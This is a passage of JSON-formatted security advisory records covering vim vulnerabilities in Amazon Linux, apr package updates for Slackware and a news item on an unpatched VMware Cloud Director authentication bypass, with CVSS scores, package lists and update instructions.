"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940", "CVE-2022-24963"], "modified": "2023-02-14T22:18:00", "id": "ALAS2-2023-1936", "href": "https://alas.aws.amazon.com/AL2/ALAS-2023-1936.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:45:51", "description": "**Issue Overview:**\n\nA flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3778)\n\nA use-after-free vulnerability in vim could allow an attacker to input a specially crafted file leading to memory corruption and a potentially exploitable crash or code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3796)\n\nAn out-of-bounds write flaw was found in vim's drawscreen.c win_redr_status() function. This flaw allows an attacker to trick a user to open a crafted file with specific arguments in vim, triggering an out-of-bounds write. The highest threat from this vulnerability is to confidentiality, integrity, and system availability. (CVE-2021-3872)\n\nThere's an out-of-bounds read flaw in Vim's ex_docmd.c. An attacker who is capable of tricking a user into opening a specially crafted file could trigger an out-of-bounds read on a memmove operation, potentially causing an impact to application availability. (CVE-2021-3875)\n\nA flaw was found in vim. A possible heap use-after-free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability. (CVE-2021-3968)\n\nA flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability. (CVE-2021-3973)\n\nA flaw was found in vim. A possible use-after-free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability. (CVE-2021-3974)\n\n \n**Affected Packages:** \n\n\nvim\n\n**Note:**\n\nThis advisory is applicable to Amazon Linux 2 (AL2) core repository. Visit this [FAQ section](<../../faqs.html#clarify-al2-advisories>) for the difference between AL2 core and AL2 extras advisories. \n\n \n**Issue Correction:** \nRun _yum update vim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 vim-common-8.2.3642-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 vim-minimal-8.2.3642-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 vim-enhanced-8.2.3642-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 vim-X11-8.2.3642-1.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 vim-debuginfo-8.2.3642-1.amzn2.0.1.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 vim-common-8.2.3642-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 vim-minimal-8.2.3642-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 vim-enhanced-8.2.3642-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 vim-X11-8.2.3642-1.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 vim-debuginfo-8.2.3642-1.amzn2.0.1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 vim-filesystem-8.2.3642-1.amzn2.0.1.noarch \n \n src: \n \u00a0\u00a0\u00a0 vim-8.2.3642-1.amzn2.0.1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 vim-common-8.2.3642-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 vim-minimal-8.2.3642-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 vim-enhanced-8.2.3642-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 vim-X11-8.2.3642-1.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 vim-debuginfo-8.2.3642-1.amzn2.0.1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-3778](<https://access.redhat.com/security/cve/CVE-2021-3778>), [CVE-2021-3796](<https://access.redhat.com/security/cve/CVE-2021-3796>), [CVE-2021-3872](<https://access.redhat.com/security/cve/CVE-2021-3872>), [CVE-2021-3875](<https://access.redhat.com/security/cve/CVE-2021-3875>), [CVE-2021-3968](<https://access.redhat.com/security/cve/CVE-2021-3968>), [CVE-2021-3973](<https://access.redhat.com/security/cve/CVE-2021-3973>), [CVE-2021-3974](<https://access.redhat.com/security/cve/CVE-2021-3974>)\n\nMitre: [CVE-2021-3778](<https://vulners.com/cve/CVE-2021-3778>), [CVE-2021-3796](<https://vulners.com/cve/CVE-2021-3796>), [CVE-2021-3872](<https://vulners.com/cve/CVE-2021-3872>), [CVE-2021-3875](<https://vulners.com/cve/CVE-2021-3875>), [CVE-2021-3968](<https://vulners.com/cve/CVE-2021-3968>), [CVE-2021-3973](<https://vulners.com/cve/CVE-2021-3973>), [CVE-2021-3974](<https://vulners.com/cve/CVE-2021-3974>)\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.3}, "published": "2021-12-08T16:27:00", "type": "amazon", "title": "Medium: vim", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3778", "CVE-2021-3796", "CVE-2021-3872", "CVE-2021-3875", "CVE-2021-3968", "CVE-2021-3973", "CVE-2021-3974"], "modified": "2023-02-17T00:13:00", "id": "ALAS-2021-1728", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1728.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2023-11-27T15:27:06", "description": "New apr packages are available for Slackware 15.0 and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 15.0 ChangeLog:\n\npatches/packages/apr-1.7.2-i586-1_slack15.0.txz: Upgraded.\n This update fixes security issues:\n Integer Overflow or Wraparound vulnerability in apr_encode functions of\n Apache Portable Runtime (APR) allows an attacker to write beyond bounds\n of a buffer. (CVE-2022-24963)\n Restore fix for out-of-bounds array dereference in apr_time_exp*() functions.\n (This issue was addressed as CVE-2017-12613 in APR 1.6.3 and\n later 1.6.x releases, but was missing in 1.7.0.) (CVE-2021-35940)\n For more information, see:\n https://vulners.com/cve/CVE-2022-24963\n https://vulners.com/cve/CVE-2021-35940\n https://vulners.com/cve/CVE-2017-12613\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 15.0:\nftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/apr-1.7.2-i586-1_slack15.0.txz\n\nUpdated package for Slackware x86_64 15.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/apr-1.7.2-x86_64-1_slack15.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/apr-1.7.2-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/apr-1.7.2-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 15.0 package:\nf27961f2a01dbddb9485c4ddd075f023 apr-1.7.2-i586-1_slack15.0.txz\n\nSlackware x86_64 15.0 package:\n328109881520f4758c0f435f33b1eee5 apr-1.7.2-x86_64-1_slack15.0.txz\n\nSlackware -current package:\nbdf0e548f53c8e2e8af46a6db145ad2e l/apr-1.7.2-i586-1.txz\n\nSlackware x86_64 -current package:\n083b32601177fe6096858986c0ed194b l/apr-1.7.2-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg apr-1.7.2-i586-1_slack15.0.txz", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-01T22:29:05", "type": "slackware", "title": "[slackware-security] apr", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940", "CVE-2022-24963"], "modified": "2023-02-01T22:29:05", "id": "SSA-2023-032-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2023&m=slackware-security.367565", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2023-11-15T04:42:01", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLcEfiiZzDiwCkaj-4kSgjtNMuA1dw467mYJvHZ_F0GZdG9BgLRQ8DmDCGxtoufqV49GlbW_8ExKxQPn7D6XR1Tb3vxaxTiXtirCoj56DLR-s7cAsffTKfDxYmJwsIhhNoRGUCPlTtk38c8A4xg9nOJI1pKSwtLS2q252_zZt3nR1NjddnnRy1bY52dB6m/s728-rw-ft-e30/vmware.jpg>)\n\nVMware is warning of a critical and unpatched security flaw in Cloud Director that could be exploited by a malicious actor to get around authentication protections.\n\nTracked as **CVE-2023-34060** (CVSS score: 9.8), the vulnerability impacts instances that have been upgraded to version 10.5 from an older version.\n\n\"On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with network access to the appliance can bypass login restrictions when authenticating on port 22 (ssh) or port 5480 (appliance management console),\" the company [said](<https://www.vmware.com/security/advisories/VMSA-2023-0026.html>) in an alert.\n\n\"This bypass is not present on port 443 (VCD provider and tenant login). On a new installation of VMware Cloud Director Appliance 10.5, the bypass is not present.\"\n\nThe virtualization services company further noted that the impact is due to the fact that it utilizes a version of sssd from the underlying Photon OS that is affected by [CVE-2023-34060](<https://github.com/vmware/photon/wiki/security-advisory-CVE-2023-34060>).\n\n[](<https://thn.news/pjHvTZON> \"Cybersecurity\" )\n\nDustin Hartle from IT solutions provider Ideal Integrations has been credited with discovering and reporting the shortcomings.\n\nWhile VMware has yet to release a fix for the problem, it has provided a [workaround](<https://kb.vmware.com/s/article/95534>) in the form of a shell script (\"WA_CVE-2023-34060.sh\").\n\nIt also emphasized implementing the temporary mitigation will neither require downtime nor have a side-effect on the functionality of Cloud Director installations.\n\nThe development comes weeks after VMware released patches for another critical flaw in the vCenter Server ([CVE-2023-34048](<https://thehackernews.com/2023/10/act-now-vmware-releases-patch-for.html>), CVSS score: 9.8) that could result in remote code execution on affected systems.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-11-15T04:18:00", "type": "thn", "title": "Urgent: VMware Warns of Unpatched Critical Cloud Director Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34048", "CVE-2023-34060"], "modified": "2023-11-15T04:18:03", "id": "THN:17D0D209B56B4709BECDD8021277421F", "href": "https://thehackernews.com/2023/11/urgent-vmware-warns-of-unpatched.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}